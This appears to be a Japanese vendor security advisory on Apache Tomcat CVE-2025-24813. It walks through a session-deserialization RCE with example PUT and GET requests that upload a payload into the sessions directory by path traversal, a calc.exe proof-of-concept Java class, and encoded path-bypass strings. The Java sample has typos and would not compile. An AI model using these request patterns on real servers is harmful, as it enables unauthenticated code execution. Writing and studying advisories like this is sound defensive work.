[2025.04 脆弱性レポート] Apache Tomcat RCE 脆弱性 (CVE-2025-24813)

Apache Tomcatは、世界中で広く使用されているJavaベースのウェブ・アプリケーション・サーバーであり、最近、CVE-2025-24813として特定された深刻なパス等価性の脆弱性が発見された。この脆弱性は、DefaultServletのパス検証エラーにより、攻撃者が認証なしで制限されたリソースにアクセスしたり、任意のコードを実行したりできる危険性をもたらします。

攻撃者は、特別に細工されたパスを含む HTTP リクエストを通して認証を回避し、通常は認証されたユーザのみが利用可能なタスクを実行することができます。特に、システム特権を完全に奪取したり、悪意のあるファイルを実行したりするリモートコード実行（RCE）の試みにつながる可能性があるため、Apache Tomcatを使用している企業や組織は、最新のセキュリティパッチを緊急に適用する必要があります。

当社のAIWAF製品は、Apache Tomcatのような広く利用されているオープンソースベースのWebサーバで発生する可能性のある脆弱性をリアルタイムで継続的に監視・検知し、検知シグネチャやバイパスパターン解析に基づいて先制防御が可能なように対応しています。今後も同様のパスバイパスや認証バイパスの脆弱性を分析し、アップデートしていく予定です。

1. 概要

Apache Tomcatは、Java Server Pages（JSP）やJava Servletを実行するためのサーブレットコンテナを提供するApache License Version 2のオープンソースソフトウェアです。商用Webアプリケーションサーバのサーブレットコンテナとして広く利用されており、本ソフトウェアのRCE脆弱性を解析した。

ソース : https://tomcat.apache.org/

2. 攻撃タイプ

CVE-2025-24813 は、Tomcat が部分的な PUT リクエストを処理する方法に起因しており、リモートの認証されていない攻撃者がリモートでコード実行 (RCE) を実行したり、セキュリティ上重要なファイルを閲覧したり、それらのファイルにコンテンツを注入したりすることを可能にします。

• 攻撃者は、Base64エンコードされたシリアライズされたJavaペイロードを含むPUTリクエストをサーバに送信する。このペイロードは、デシリアライズ時にRCEを引き起こすように設計されている。
  • ex)

    PUT /uploads/check.txt HTTP/1.1
    Host: vulnerabel-server.com
    Content-Length: 10
    
    testdata
    

• Javaベースのペイロードを作成する
  • ex)

    import java.io.IOException;
    
    public calss Exploit{
      static{
        trt{
          Runtime.getRuntime().exec("cmd.exe /c calc.exe");
        } catch (IOException e){
          e.printStackTrace();
        }
      }
    }
    

• エクスプロイト・アップロード・パケットの生成
  • ex)

    PUT /uploads/../sessions/attacker.session HTTP/1.1
    Host: vulnerable-server.com
    Content-Type: application/octet-stream
    Content-Length: 1024
    
    <serialized payload data>
    

  • Apache Tomcatは、ディレクトリトラバーサルにより、このファイルを正規のセッションオブジェクトとして誤って扱います。
• 上記のリクエストを送信した後、攻撃者は悪意のあるセッションを参照する特別に細工された「JSESSIONID」クッキーでGETリクエストを送信し、サーバーにペイロードをデシリアライズさせ、任意のコードを実行させる。
  • ex)

    GET /index.jsp HTTP/1.1
    Host: vulnerable-server.com
    Cookie: JSESSIONID=attacker
    

3. 対応

CVE-2025-24813は、Tomcat 9.0.99以降、10.1.35以降、11.0.3以降のセキュリティパッチで対処されており、これらのバージョン以降の使用を推奨します。

この脆弱性については、/..;/, %2e%2e%3b/, ;%2e%2e/ などのエンコードされたバイパスパス経由の攻撃に対処するため、弊社のWAFをさらに分析し、更新する予定です。

4. 結論

世界中で使用されている人気の高いJavaベースのウェブ・アプリケーション・サーバーであるApache Tomcatには、最近、CVE-2025-24813として識別されるRCEの脆弱性が含まれていることが発見された。この脆弱性は、DefaultServletのパス検証エラーによるもので、攻撃者が認証なしで制限されたリソースにアクセスしたり、任意のコードを実行したりする可能性があります。

特別に細工されたパスで HTTP リクエストを送信することで、攻撃者は認証をバイパスし、通常は認証されたユーザのみが実行可能なアクションを実行することができます。このため、Apache Tomcatを使用している組織や機関では、最新のセキュリティパッチを適用することが急務となっています。

当社のAIWAF製品は、Apache Tomcatのような広く利用されているオープンソースベースのWebサーバーの脆弱性をリアルタイムで継続的に監視・検知しており、検知シグネチャやバイパスパターン分析に基づくプロアクティブな防御により、これらの脆弱性に対応しています。今後も同様のパスバイパスや認証バイパスの脆弱性を分析し、アップデートしていく予定です。

5. 参考文献

• https://www.cyfirma.com/research/cve-2025-24813-apache-tomcat-rce-vulnerability-analysis/
• https://www.rapid7.com/blog/post/2025/03/19/etr-apache-tomcat-cve-2025-24813-what-you-need-to-know/
• https://www.recordedfuture.com/blog/apache-tomcat-cve-2025-24813-vulnerability-analysis
• https://nvd.nist.gov/vuln/detail/CVE-2025-24813